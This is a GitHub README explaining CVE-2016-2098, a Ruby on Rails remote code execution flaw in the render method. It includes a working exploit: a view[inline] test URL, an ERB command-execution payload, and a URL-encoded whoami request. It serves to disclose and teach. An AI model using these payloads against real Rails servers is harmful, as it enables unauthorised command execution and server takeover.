CVE-2016-2098

Remote code execution vulnerability in Ruby-on-Rails when using render on user-supplied data.

Explanation:

This issue comes from the usage of the render method on user-supplied data.

The method render is usually used to render a page from a template, but render method also allows developers to render plain text (plaintext) and even inline code (inline).

render function:

# File actionpack/lib/abstract_controller/rendering.rb, line 23
def render(*args, &block)
  options = _normalize_render(*args, &block)
  rendered_body = render_to_body(options)
  if options[:html]
    _set_html_content_type
  else
    _set_rendered_content_type rendered_format
  end
  _set_vary_header
  self.response_body = rendered_body
end

Exploitaion Example:

Target URL:

http://example.com/?view=test

Exploitaion:

http://example.com/?view[inline]=OK

If 'OK' showen in the source code then the web application is vulnerable to CVE-2016-2098.

Remote Code Execution

<%= %x('[CMD]') %>

We can replace CMD to our command that we want it to be excutued.

<%= %x('whoami') %>

After URL encoding:

%3C%25=%20%25x(whoami)%20%25%3E

Final:

http://example.com/?view[inline]=%3C%25=%20%25x(whoami)%20%25%3E

Resources:

https://guides.rubyonrails.org/layouts_and_rendering.html

Name		Name	Last commit message	Last commit date
Latest commit History 9 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Repository files navigation

CVE-2016-2098

Explanation:

Exploitaion Example:

Remote Code Execution

Resources:

About

Releases

Packages

j4k0m/CVE-2016-2098

Folders and files

Latest commit

History

README.md

README.md

Repository files navigation

CVE-2016-2098

Explanation:

Exploitaion Example:

Remote Code Execution

Resources:

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages